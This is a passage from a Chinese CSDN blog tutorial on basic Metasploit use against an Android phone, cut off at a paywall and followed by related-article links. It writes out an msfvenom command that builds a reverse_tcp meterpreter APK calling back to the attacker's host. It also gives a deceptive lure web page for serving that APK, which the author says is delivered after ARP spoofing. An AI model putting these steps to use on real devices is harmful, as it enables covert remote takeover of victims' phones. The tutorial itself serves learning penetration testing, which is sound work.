metasploit基础使用

最新推荐文章于 2024-04-07 17:02:27 发布
最新推荐文章于 2024-04-07 17:02:27 发布
阅读量2k 收藏 8
点赞数 3
分类专栏: 渗透测试 文章标签: csdn metasploit 安卓手机渗透 msf数据库建立 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xs0340229/article/details/54985966
版权 
虽然开通csdn已经有一段时间了,可是一直由于各方面原因没有使用过csdn,在开始学东西之前,大牛们一直说要写一些东西来记录,一直深以为然,所以准备坚持这个好习惯,来一个好的开始,接触metasploit这个工具有一段时间了,虽然不能灵活运用,但进行一些基础的渗透和攻击测试还是比较轻松的,一直在kali上使用metasploit,因为kali集成了很多工具,使用起来比较方便,本人也偏爱  kali,在windows上也试验了metasploit,但是由于环境不够完善,进行一次完整的渗透测试比较困难,在windows上我使用的是pentestbox这个软件,这是windows上的渗透测试神器,它集成了很多诸如sqlmap,ettercap,burp还有metasploit等工具,感兴趣的可以看看这个[pentestbox链接](http://www.freebuf.com/sectool/120877.html),下面我们开始

1.环境准备:

攻击者(windows或linux下有渗透测试环境的主机,包括nmap,metasploit,ettercap,apache服务器)ip:192.168.1.106

2.渗透测试攻击者主机环境搭建:

root@KALI:/# service postgresql start 
root@KALI:/# msfconsole
msf > db_status 
[*] postgresql connected to msf4

在这一步先开启postgresql的数据库,然后进入msf,其中db_status用来检查数据库连接状态,如果数据库没有创建或自动连接,比如下面所示

msf > db_status 
[*] postgresql selected, no connection

可以在msf外面新建一个数据库,我这里就是自己新建的数据库msf4,具体操作流程如下:
首先退出msf,进入数据库:

~# su postgres

创建新的用户并指定密码:
$ createuser msf4 -P
然后输入两次密码即可

创建数据库并指定数据库所有者为msf4,数据库名称也为msf4
$ createdb --owner=msf4 msf4
退出数据库并重启postgresql
service postgresql restart
然后进入msf进行连接:
msf > db_connect msf4:msf4@localhost/msf4
[*] Rebuilding the module cache in the background...
msf > db_status
[*] postgresql connected to msf5
稍等片刻正在后台重建数据库,然后就可以使用了

然后开启kali的apache2服务器,用于arp欺骗后的恶意文件传输

root@KALI:~# /etc/init.d/apache2 start 
[ ok ] Starting apache2 (via systemctl): apache2.service.

然后配置apache2服务器的主页,kaliRolling版本的在目录:
/var/www/html/index.html
配置一个可以下载文件html网页,实例如下:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
 <HEAD>
  <meta http-equiv="Content-Type" content="text/html">
  <TITLE>Page de test de l'installation d'Apache</TITLE>
 </HEAD>
<!-- Background white, links blue (unvisited), navy (visited), red
(active) -->
 <BODY
  BGCOLOR="#FFFFFF"
  TEXT="#000000"
  LINK="#0000FF"
  VLINK="#000080"
  ALINK="#FF0000"
 >
<a><strong>This is a very beautiful apk,look look!!!<br></br></strong></a>
<img src=http://192.168.1.106/timg.jpg height="500" width="330">
<a href="http://192.168.1.106/text.apk"><strong><br></br>[Download]</strong></a>
</BODY>
</HTML>

将制作好的文件放在同一目录下,并修改文件中的相应位置即可,这里是http://192.168.1.106/timg.jpg
http://192.168.1.106/text.apk 图片自己去下载一个放上去,用来吸引视线。

3.android手机的metasploit渗透攻击:

攻击目标android手机ip:192.168.1.115

本次渗透攻击我们使用payload里面的reverse_tcp进行攻击测试
首先在主机上利用msfvenom的功能生成恶意apk文件:

root@KALI:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.106 LPORT=5555 R > /root/japanAV.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 8845 bytes

可以使用msfvenom -h 查看使用方法,这里-P是指定利用模块,后面LHOST和LPORT配置参数,指定到我本机的5555端口

然后将生成的apk文件放到上述index.html的地址,并修改html文件中的apk名称:

root@KALI:~# cp /root/japanAV.apk /var/www/html/
root@KALI<
最低0.47元/天 解锁文章
Eenki
关注
  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
metasploit入门用法
06-03
metasploit中exploit模块的使用流程
( Metasploit漏洞利用基础教程
11-03
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
Metasploits使用入门
gwt0425的博客
02-11 482
情报收集战术 外围信息搜索 whois 域名注册信息查询 nslookup/dig 根据域名查询ip IP2Location 根据IP查询地址(www.cz88.net) netcraft 服务器信息查询服务 IP2Domain 反查域名(www.7c.com) 搜索引擎收集 Google Hacking(GHDB, SiteDigger, Search Diggity) 网站目录的...
【2024最新版】超详细Metasploit安装保姆级教程,Metasploit渗透测试使用,看完这一篇就够了
最新发布
2201_75735270的博客
04-07 958
为了帮助大家更好的学习网络安全,小编给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,所有资料共282G,朋友们如果有需要全套网络安全入门+进阶学习资源包,可以。
Metasploit用法大全
weixin_30807779的博客
01-24 792
Metasploit用户接口msfconsoleArmitage: KaliGUI启动;armitage命令启动 Metasploit功能程序msfvenom集成了载荷生成器、载荷编码器、空指令生成器的功能查看详细指令选项:msfvenom-h 服务器消息块协议扫描msf>useauxiliary/scanner/smb/smb_version 搜寻配置不当的Microso...
Metasploit常用后渗透脚本——远程监视
渗透测试
06-05 2256
文章目录前言一、迁移进程二、安装远程VNC会话三、关闭杀毒软件四、获取系统密码哈希值五、查看目标机上的所有流量六、提取系统信息七、控制持久化八、查看更多脚本总结 前言 本文详细介绍了metasploit获取meterpreter权限常用的后渗透脚本的功能和实践过程 测试环境 描述 ip 主机 kali 2020 192.168.1.113 靶机 winxp sp3 192.168.1.106 首先使用ms08_067渗透模块对靶机进行渗透测试,详细步骤看 ms08_067漏洞渗透
Metasploit 基础知识
08-17
Metasploit 基础知识
metasploit使用
11-05
- **metasploit_he_pentration_tester's_guide.pdf**: 可能是Metasploit渗透测试者的指南,涵盖从基础到进阶的Metasploit使用方法。 - **Packtpub.Metasploit.Penetration.Testing.Cookbook.Jun.2012.pdf**: 这本...
渗透Metasploit Framework基础知识
12-28
Metasploit Framework基础知识
Windows网络服务渗透测试实战-跨网段攻击
c_lanxiaofang的博客
05-19 6234
一、实验项目名称 Windows网络服务渗透测试实战-跨网段攻击 二、实验目的及要求 掌握对跨网段攻击的方法。 熟悉Metasploit终端的使用方法。 熟悉通过meterpreter进行后渗透操作 获取winxp系统管理员admin的密码,并使xp系统关机 ----基础配置---- 1、选择win7 2.选择winXP 3、选择kali 4、查看kali的ip 5、查看winXP的ip 6、查看win7的IP 总结如下: ...
Metasploit 4.0下载地址
03-09
Metasploit 4.0下载地址,window版,最新版,资源太大,无法上传,请谅解!
Metasploit 渗透测试手册第三版 第三章 服务端漏洞利用(翻译)
weixin_34189116的博客
04-29 3192
第三章 服务端漏洞利用 在本章中,我们将学习以下内容 1、攻击Linux服务器 2、SQL注入攻击 3、shell类型 4、攻击Windows服务器 5、利用公用服务 6、MS17-010 永恒之蓝 SMB远程代码执行Windows内核破坏 7、MS17-010 EternalRomance/EternalSynergy/EternalChampion 8、植入后门 9、拒绝服务攻击 简介 在第二...
渗透测试工具——Metasploit
weixin_59872639的博客
01-14 3万+
Metasplout简介 Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具。 Metasploit核心中绝大部分有Rudy实现,一小部分由汇编和C语言实现。 kali中自带Metasploit Metasploit文件结构与模块 路径: /usr/share/metasploit-framework/ config: MSF环境配置信息,数据库配置信息 data:后渗透模块的一些工具及payload,第三方小工具集合,用户字典等数据信息 doc
【P3】最强渗透工具 - metasploit(安装配置及使用教程详解)
qq_45138120的博客
06-23 7014
包括 metasploit 是什么?、metasploit 攻击 windows 操作系统、metasploit 攻击永恒之蓝全流程、使用 Kali 渗透工具生成远控木马、metasploit 攻击示例、msfvenom 绕过杀毒软件技巧之捆绑木马、msfvenom 绕过杀毒软件技巧之加壳、windows 下安装 Themida、Themida 使用教程。
Metasploit安装及使用教程(非常详细)从零基础入门到精通,看完这一篇就够了。
ZL_1618的博客
06-14 2037
通过本篇文章,我们将会学习以下内容:1、在Windows上安装Metasploit2、在Linux和MacOS上安装Metasploit3、在Kali Linux中使用 Metasploit4、升级Kali Linux5、使用虚拟化软件构建渗透测试实验环境6、配置SSH连接7、使用SSH连接Kali8、配置PostgreSQL数据库9、创建工作区10、使用数据库11、使用hosts命令12、理解services命令。
Metasploit技术(一)——Metasploit简介与基础
Phantom03167的博客
03-28 9302
Metasploit简介与基础
Metasploit入门用法(主动攻击)
热门推荐
shark-CV的博客
06-03 8万+
Metasploit入门用法(主动攻击) –作者:CV 本文主要讲metasploit的入门用法,还有一些渗透细节和思路,有不足的,欢迎互相学习研究。本人区别于书籍的特点是:书籍以模块为划分,我是以连续的步骤进行书写,更突出一次渗透的思路,同时我会通过强调步骤的细节技巧,用以拓展相关类容。
MSF】Kali最强渗透工具之Metasploit
zou09241314的博客
10-23 970
类似于msf有一个神奇的魔法,能让复杂的漏洞攻击的流程变得非常简单,一个电脑小白经过几小时的学习,就能对操作系统等主流漏洞发起危害性攻击。 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。
metasploit 使用教程
09-01
Metasploit是一个广泛使用渗透测试工具,用于发现和利用安全漏洞。下面是一个简要的Metasploit使用教程: 1. 安装Metasploit:你可以从官方网站(https://www.metasploit.com/)下载Metasploit框架。根据你的操作系统选择适当的版本,并按照安装指南进行安装。 2. 了解基础知识:在使用Metasploit之前,建议你对网络协议、漏洞利用和渗透测试基础知识有一定的了解。这将帮助你更好地理解和使用Metasploit。 3. 启动Metasploit:安装完成后,你可以通过命令行或者图形界面启动Metasploit。启动后,你将看到一个交互式的命令行界面。 4. 扫描目标:在使用Metasploit之前,你需要扫描目标网络或主机来发现潜在的漏洞。你可以使用Nmap等工具进行端口扫描、服务识别等操作。 5. 选择并配置模块:Metasploit提供了许多不同类型的模块,包括扫描模块、漏洞利用模块、Payload模块等。你可以使用search命令查找相关模块,并使用use命令选择需要的模块。 6. 设置目标:使用set命令配置目标主机的IP地址、端口等信息。你还可以使用options命令查看和修改模块的参数设置。 7. 运行模块:配置完成后,你可以使用exploit命令运行模块。Metasploit将尝试利用已知漏洞攻击目标主机。 8. 获取访问权限:成功运行模块后,你可能会获得对目标主机的访问权限。这包括远程命令执行、文件上传/下载等功能。 请注意,Metasploit是一个强大的工具,需要在合法授权和合规的情况下使用。在进行任何渗透测试活动之前,务必遵循适当的法律和道德准则,并获得相关许可。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值